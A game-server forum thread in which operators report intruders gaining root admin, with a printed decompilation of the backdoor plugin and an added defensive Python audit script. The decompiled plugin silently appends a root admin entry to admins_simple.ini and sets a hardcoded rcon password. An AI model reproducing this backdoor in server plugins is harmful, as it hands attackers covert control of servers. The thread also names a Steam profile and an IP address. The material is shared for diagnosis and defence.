Possible exploit
Sizzla
Junior Member
Join Date: Jun 2014
Old 01-29-2018 , 03:05   Possible exploit
#1

Hello
There is probably an exploit in admin-flatfile.smx or in SourceMod, because I experienced this week a situation when a little cunt added herself to admins_simple.txt and then refreshed the admin cache. Also I noticed strange plugins in the folder (look at attachment strangeplugins-min.jpg) and a server.cfg file which contains not server configuration commands but probably a compiled backdoor (look at attachments server-strangename.png and server.cfg.tar).
Temporarily I disabled the admin-flatfile plugin, but I think you should fix it as soon as possible because it's not happening only on my server.
This guy http://steamcommunity.com/profiles/76561197965954837 was the first to add herself to the admin list.

Quote:
meta version
Metamod:Source Version Information
Metamod:Source version 1.11.0-dev+1102
Plugin interface version: 16:14
SourceHook version: 5:5
Loaded As: Valve Server Plugin
Compiled on: Dec 19 2017 23:525
Built from: https://github.com/alliedmodders/met...commit/d6ee3bf
Build ID: 1102:d6ee3bf
http://www.metamodsource.net/
Quote:
sm version
SourceMod Version Information:
SourceMod Version: 1.9.0.6225
SourcePawn Engine: 1.9.0.6225, jit-x86 (build 1.9.0.6225)
SourcePawn API: v1 = 4, v2 = 12
Compiled on: Jan 7 2018 10:58:57
Built from: https://github.com/alliedmodders/sou...commit/083ab81
Build ID: 6225:083ab81
http://www.sourcemod.net/

By the way, he couldn't log in to the machine and add herself to the admin list, because login is based on a private key and password; also the rcon protocol is disabled.


Best regards
Attached: server-strangename.png, strangeplugins-min.jpg, server.cfg.tar

Last edited by Sizzla; 01-29-2018 at 03:14.
Fyren
Join Date: Feb 2106
Old 01-29-2018 , 03:57   Re: Possible exploit
#2

SM itself never writes to any of the admin config files. It has no functionality to accept file uploads.

The server.cfg file with a bunch of spaces in the name that you attached is a plugin that writes to admins_simple.ini and sets the rcon password.

While there could possibly be security flaws in anything, including SM, you have provided no evidence pointing to anything in particular, let alone SM. There have been server exploits in the past allowing clients to upload files.
asdfxD
Veteran Member
Join Date: Apr 2011
Old 01-29-2018 , 04:17   Re: Possible exploit
#3

kamay is a css/csgo hack coder known from royalhack, so I think it is really an exploit that should be fixed lol

Last edited by asdfxD; 01-29-2018 at 04:17.
8guawong
AlliedModders Donor
Join Date: Dec 2013
Location: BlackMarke7
Old 01-29-2018 , 11:23   Re: Possible exploit
#4

Quote:
Originally Posted by asdfxD
kamay is a css/csgo hack coder known from royalhack, so I think it is really an exploit that should be fixed lol
The developers already said you need to provide evidence of the exploit.
Sizzla
Junior Member
Join Date: Jun 2014
Old 01-29-2018 , 11:48   Re: Possible exploit
#5

Quote:
Originally Posted by Fyren
SM itself never writes to any of the admin config files. It has no functionality to accept file uploads.

The server.cfg file with a bunch of spaces in the name that you attached is a plugin that writes to admins_simple.ini and sets the rcon password.

While there could possibly be security flaws in anything, including SM, you have provided no evidence pointing to anything in particular, let alone SM. There have been server exploits in the past allowing clients to upload files.
I have no idea what other evidence I can provide. The fact is this guy uploaded to my server a plugin which gave him admin access. As I wrote before, there is no option that someone entered my machine, because login is via SSH secured by private key & password. Also the rcon port is blocked, not only deactivated. He uploaded an SM plugin, so it must be a gap in the security of SourceMod/Metamod or the game... Do you have any idea how he did this and how to protect the server?
And you are right, this server.cfg is a SourceMod plugin. Decompiled, it looks like:
Code:
/*
** ATTENTION
** THE PRODUCED CODE, IS NOT ABLE TO COMPILE!
** THE DECOMPILER JUST TRIES TO GIVE YOU A POSSIBILITY
** TO LOOK HOW A PLUGIN DOES IT'S JOB AND LOOK FOR
** POSSIBLE MALICIOUS CODE.
**
** ALL CONVERSIONS ARE WRONG! AT EXAMPLE:
** SetEntityRenderFx(client, RenderFx 0);  →  SetEntityRenderFx(client, view_as<RenderFx>0);  →  SetEntityRenderFx(client, RENDERFX_NONE);
*/

 PlVers __version = 5;
 float NULL_VECTOR[3];
 char NULL_STRING[1];
 Extension __ext_core = 68;
 int MaxClients;
 Extension __ext_sdktools = 2220;
public Plugin myinfo =
{
	name = "rconprotect",
	description = "Protect your rcon from faggots.",
	author = "Who knows.",
	version = "1.00",
	url = ""
};
public void __ext_core_SetNTVOptional()
{
	MarkNativeAsOptional("GetFeatureStatus");
	MarkNativeAsOptional("RequireFeature");
	MarkNativeAsOptional("AddCommandListener");
	MarkNativeAsOptional("RemoveCommandListener");
	MarkNativeAsOptional("BfWriteBool");
	MarkNativeAsOptional("BfWriteByte");
	MarkNativeAsOptional("BfWriteChar");
	MarkNativeAsOptional("BfWriteShort");
	MarkNativeAsOptional("BfWriteWord");
	MarkNativeAsOptional("BfWriteNum");
	MarkNativeAsOptional("BfWriteFloat");
	MarkNativeAsOptional("BfWriteString");
	MarkNativeAsOptional("BfWriteEntity");
	MarkNativeAsOptional("BfWriteAngle");
	MarkNativeAsOptional("BfWriteCoord");
	MarkNativeAsOptional("BfWriteVecCoord");
	MarkNativeAsOptional("BfWriteVecNormal");
	MarkNativeAsOptional("BfWriteAngles");
	MarkNativeAsOptional("BfReadBool");
	MarkNativeAsOptional("BfReadByte");
	MarkNativeAsOptional("BfReadChar");
	MarkNativeAsOptional("BfReadShort");
	MarkNativeAsOptional("BfReadWord");
	MarkNativeAsOptional("BfReadNum");
	MarkNativeAsOptional("BfReadFloat");
	MarkNativeAsOptional("BfReadString");
	MarkNativeAsOptional("BfReadEntity");
	MarkNativeAsOptional("BfReadAngle");
	MarkNativeAsOptional("BfReadCoord");
	MarkNativeAsOptional("BfReadVecCoord");
	MarkNativeAsOptional("BfReadVecNormal");
	MarkNativeAsOptional("BfReadAngles");
	MarkNativeAsOptional("BfGetNumBytesLeft");
	MarkNativeAsOptional("BfWrite.WriteBool");
	MarkNativeAsOptional("BfWrite.WriteByte");
	MarkNativeAsOptional("BfWrite.WriteChar");
	MarkNativeAsOptional("BfWrite.WriteShort");
	MarkNativeAsOptional("BfWrite.WriteWord");
	MarkNativeAsOptional("BfWrite.WriteNum");
	MarkNativeAsOptional("BfWrite.WriteFloat");
	MarkNativeAsOptional("BfWrite.WriteString");
	MarkNativeAsOptional("BfWrite.WriteEntity");
	MarkNativeAsOptional("BfWrite.WriteAngle");
	MarkNativeAsOptional("BfWrite.WriteCoord");
	MarkNativeAsOptional("BfWrite.WriteVecCoord");
	MarkNativeAsOptional("BfWrite.WriteVecNormal");
	MarkNativeAsOptional("BfWrite.WriteAngles");
	MarkNativeAsOptional("BfRead.ReadBool");
	MarkNativeAsOptional("BfRead.ReadByte");
	MarkNativeAsOptional("BfRead.ReadChar");
	MarkNativeAsOptional("BfRead.ReadShort");
	MarkNativeAsOptional("BfRead.ReadWord");
	MarkNativeAsOptional("BfRead.ReadNum");
	MarkNativeAsOptional("BfRead.ReadFloat");
	MarkNativeAsOptional("BfRead.ReadString");
	MarkNativeAsOptional("BfRead.ReadEntity");
	MarkNativeAsOptional("BfRead.ReadAngle");
	MarkNativeAsOptional("BfRead.ReadCoord");
	MarkNativeAsOptional("BfRead.ReadVecCoord");
	MarkNativeAsOptional("BfRead.ReadVecNormal");
	MarkNativeAsOptional("BfRead.ReadAngles");
	MarkNativeAsOptional("BfRead.GetNumBytesLeft");
	MarkNativeAsOptional("PbReadInt");
	MarkNativeAsOptional("PbReadFloat");
	MarkNativeAsOptional("PbReadBool");
	MarkNativeAsOptional("PbReadString");
	MarkNativeAsOptional("PbReadColor");
	MarkNativeAsOptional("PbReadAngle");
	MarkNativeAsOptional("PbReadVector");
	MarkNativeAsOptional("PbReadVector2D");
	MarkNativeAsOptional("PbGetRepeatedFieldCount");
	MarkNativeAsOptional("PbSetInt");
	MarkNativeAsOptional("PbSetFloat");
	MarkNativeAsOptional("PbSetBool");
	MarkNativeAsOptional("PbSetString");
	MarkNativeAsOptional("PbSetColor");
	MarkNativeAsOptional("PbSetAngle");
	MarkNativeAsOptional("PbSetVector");
	MarkNativeAsOptional("PbSetVector2D");
	MarkNativeAsOptional("PbAddInt");
	MarkNativeAsOptional("PbAddFloat");
	MarkNativeAsOptional("PbAddBool");
	MarkNativeAsOptional("PbAddString");
	MarkNativeAsOptional("PbAddColor");
	MarkNativeAsOptional("PbAddAngle");
	MarkNativeAsOptional("PbAddVector");
	MarkNativeAsOptional("PbAddVector2D");
	MarkNativeAsOptional("PbRemoveRepeatedFieldValue");
	MarkNativeAsOptional("PbReadMessage");
	MarkNativeAsOptional("PbReadRepeatedMessage");
	MarkNativeAsOptional("PbAddMessage");
	MarkNativeAsOptional("Protobuf.ReadInt");
	MarkNativeAsOptional("Protobuf.ReadFloat");
	MarkNativeAsOptional("Protobuf.ReadBool");
	MarkNativeAsOptional("Protobuf.ReadString");
	MarkNativeAsOptional("Protobuf.ReadColor");
	MarkNativeAsOptional("Protobuf.ReadAngle");
	MarkNativeAsOptional("Protobuf.ReadVector");
	MarkNativeAsOptional("Protobuf.ReadVector2D");
	MarkNativeAsOptional("Protobuf.GetRepeatedFieldCount");
	MarkNativeAsOptional("Protobuf.SetInt");
	MarkNativeAsOptional("Protobuf.SetFloat");
	MarkNativeAsOptional("Protobuf.SetBool");
	MarkNativeAsOptional("Protobuf.SetString");
	MarkNativeAsOptional("Protobuf.SetColor");
	MarkNativeAsOptional("Protobuf.SetAngle");
	MarkNativeAsOptional("Protobuf.SetVector");
	MarkNativeAsOptional("Protobuf.SetVector2D");
	MarkNativeAsOptional("Protobuf.AddInt");
	MarkNativeAsOptional("Protobuf.AddFloat");
	MarkNativeAsOptional("Protobuf.AddBool");
	MarkNativeAsOptional("Protobuf.AddString");
	MarkNativeAsOptional("Protobuf.AddColor");
	MarkNativeAsOptional("Protobuf.AddAngle");
	MarkNativeAsOptional("Protobuf.AddVector");
	MarkNativeAsOptional("Protobuf.AddVector2D");
	MarkNativeAsOptional("Protobuf.RemoveRepeatedFieldValue");
	MarkNativeAsOptional("Protobuf.ReadMessage");
	MarkNativeAsOptional("Protobuf.ReadRepeatedMessage");
	MarkNativeAsOptional("Protobuf.AddMessage");
	VerifyCoreVersion();
	return void 0;
}

public void OnPluginStart()
{
	CreateTimer(10, Timer_SetRcon, any 0, 1);
	char szFile[256];
	BuildPath(PathType 0, szFile, 256, "configs/admins_simple.ini");
	Handle hFile = OpenFile(szFile, "at", false, "GAME");
	WriteFileLine(hFile, "\"STEAM_1:1:2844554\" \"99:z\"");
	CloseHandle(hFile);
	return void 0;
}

public Action Timer_SetRcon(Handle timer)
{
	ServerCommand("rcon_password \"tlxkjc2407\"");
	return Action 0;
}

Last edited by Sizzla; 01-29-2018 at 11:49.
Timonxtimon
New Member
Join Date: Sep 2012
Old 01-29-2018 , 12:57   Re: Possible exploit
#6

Hello, I'm just some random dude that plays on a CSGO server, and I can confirm that what the creator of this topic is saying is 100% true.

My server has suffered the same fate:
A guy nicknamed "Kamay" connects to the server
The admin cache is refreshed on the server (no logs whatsoever before that of him doing anything)
He gets "root" admin 99:z
Starts typing random commands/banning/trolling people or whatever.
In server.cfg you can see the plugin (code provided by the creator of the topic)
And also tons of random plugin files visible on the server (206 files with names 1, 11 and so on)

RCON port blocked + deactivated
SSH private key is required to log in to the machine
(Which basically is enough to say that there was no file upload done from the server side)

We managed to block that from happening again by making admins_simple.txt "read only", as it was being modified (somehow; there are no logs, or we just can't trace it)

While there is no hard evidence that I can provide either, I can just confirm that this is a serious matter and it should be taken seriously, since SourceMod's integrity is at stake.

I know of SEVERAL other servers that have experienced the same thing. I can provide screenshots of forums if needed, but that's barely any evidence as well...

Whatever the case, I hope this somehow gets taken seriously and fixed as soon as possible. Fact is there is an exploit and this guy is just ruining people's day with it... and it seems like he uses SM to do it.

Last edited by Timonxtimon; 01-29-2018 at 13:06.
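As an added example (not code from this thread, from AlliedModders or from SourceMod), here is a small Python audit that checks for the indicators Fyren describes in post #2 and Timonxtimon lists in post #6: files in the plugins directory that are not on an operator's allow-list, compiled plugins hiding behind a non-.smx name such as the "server.cfg" with spaces, and entries in admins_simple.ini that are not in a known baseline, with root ("z") grants called out. The allow-list, the baseline admin, the temporary directory tree it builds and the reuse of the Steam ID from the decompiled plugin are constructed sample data; the .smx magic value is taken from SourcePawn's sp_file_headers.h and is not on the page.

```python
"""Audit a SourceMod install for the indicators discussed in this thread:
rogue files in plugins/ and unexpected entries in admins_simple.ini.
Added example; not code from the thread, AlliedModders or SourceMod."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# SourcePawn's SPFILE_MAGIC is 0x53504646, stored little-endian, so a compiled
# .smx starts with the bytes b"FFPS" (from sp_file_headers.h, not from the thread).
SMX_MAGIC = b"FFPS"

# Hypothetical allow-list of plugin file names the operator installed on purpose.
EXPECTED_PLUGINS = {"admin-flatfile.smx", "basebans.smx", "basecommands.smx"}
# Hypothetical baseline of intended admin entries: auth string -> "immunity:flags".
EXPECTED_ADMINS = {"STEAM_1:0:111111": "99:z"}

# One admins_simple.ini entry: "auth" "flags" [optional "password"].
ADMIN_LINE = re.compile(r'^\s*"([^"]+)"\s+"([^"]+)"')


def is_compiled_plugin(path: Path) -> bool:
    """True if the file starts with the SMX magic, whatever it is named."""
    with path.open("rb") as fh:
        return fh.read(4) == SMX_MAGIC


def audit_plugins(plugins_dir: Path) -> list[str]:
    """Report every file in plugins/ that is not on the allow-list and say whether
    it is a compiled plugin (a backdoor can be named '1' or 'server.cfg   ')."""
    findings = []
    for path in sorted(plugins_dir.iterdir()):
        if not path.is_file() or path.name in EXPECTED_PLUGINS:
            continue
        kind = "compiled plugin" if is_compiled_plugin(path) else "non-plugin file"
        findings.append(f"{kind} not on allow-list: {path.name!r}")
    return findings


def audit_admins(ini_path: Path) -> list[str]:
    """Parse admins_simple.ini and report entries missing from the baseline,
    flagging root ('z') grants such as the "99:z" line the rogue plugin appends."""
    findings = []
    for raw in ini_path.read_text().splitlines():
        match = ADMIN_LINE.match(raw.split("//", 1)[0])  # ignore // comments
        if not match:
            continue
        auth, flags = match.groups()
        if EXPECTED_ADMINS.get(auth) == flags:
            continue
        level = flags.split(":", 1)[-1]  # drop an "immunity:" prefix such as "99:"
        root = " (ROOT)" if not level.startswith("@") and "z" in level else ""
        findings.append(f"unexpected admin{root}: {auth} -> {flags}")
    return findings


def build_demo_install(root: Path) -> Path:
    """Constructed directory tree reproducing the thread's indicators."""
    plugins, configs = root / "plugins", root / "configs"
    plugins.mkdir()
    configs.mkdir()
    body = SMX_MAGIC + b"\x00" * 16  # minimal stand-in for a compiled plugin
    (plugins / "admin-flatfile.smx").write_bytes(body)  # legitimate
    (plugins / "1").write_bytes(body)                    # numbered junk file (post #6)
    (plugins / "server.cfg   ").write_bytes(body)        # plugin disguised as server.cfg (post #2)
    (plugins / "readme.txt").write_text("notes")         # stray but not a plugin
    (configs / "admins_simple.ini").write_text(
        "// constructed sample\n"
        '"STEAM_1:0:111111" "99:z"  // the operator\n'
        '"STEAM_1:1:2844554" "99:z"\n'  # the line the decompiled plugin writes
    )
    return root


def run_audit() -> tuple[list[str], list[str]]:
    """Build the demo tree in a temp dir and return (plugin findings, admin findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_demo_install(Path(tmp))
        return (audit_plugins(root / "plugins"),
                audit_admins(root / "configs" / "admins_simple.ini"))


if __name__ == "__main__":
    plugin_findings, admin_findings = run_audit()
    for line in plugin_findings + admin_findings:
        print(line)
```

Against a real install, call `audit_plugins` on `addons/sourcemod/plugins` and `audit_admins` on `addons/sourcemod/configs/admins_simple.ini` with your own allow-list and baseline; pairing this with a hash baseline of the whole addons/ tree, taken when the server is known clean, is what lets you say which file changed and when, which is the evidence the developers ask for in this thread.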
asherkin
SourceMod Developer
Join Date: Aug 2009
Location: OnGameFrame()
Old 01-29-2018 , 14:33   Re: Possible exploit
#7

Please zip up a complete, unmodified copy of your addons/ directory and provide it (privately) - you can PM me or email me at [email protected] (or [email protected], which will go to the core team).

No one is disputing that there is a problem here, it just isn't in SourceMod. There have been multiple bugs in the Source engine that have allowed uploading files to servers, which is what Fyren is alluding to.
ASKER_CZ
BANNED
Join Date: Nov 2016
Old 01-29-2018 , 14:43   Re: Possible exploit
#8

Does anybody have the IP of that guy / these guys so I can ban them in the firewall?

BTW: Should we be worried?

Last edited by ASKER_CZ; 01-29-2018 at 14:43.
Sizzla
Junior Member
Join Date: Jun 2014
Old 01-29-2018 , 15:41   Re: Possible exploit
#9

Quote:
Originally Posted by asherkin
Please zip up a complete, unmodified copy of your addons/ directory and provide it (privately) - you can PM me or email me at [email protected] (or [email protected], which will go to the core team).

No one is disputing that there is a problem here, it just isn't in SourceMod. There have been multiple bugs in the Source engine that have allowed uploading files to servers, which is what Fyren is alluding to.
Thank you for your attention. I sent you a private message with the current addons directory.

Quote:
Originally Posted by ASKER_CZ
Does anybody have the IP of that guy / these guys so I can ban them in the firewall?

BTW: Should we be worried?
Last time he was on, he had IP 86.229.5.28, but I think it's a dynamic address so it wouldn't help you ;/
ASKER_CZ
BANNED
Join Date: Nov 2016
Old 01-29-2018 , 15:47   Re: Possible exploit
#10

I can ban an IP range if I want. Plus I use that plugin against most known VPNs.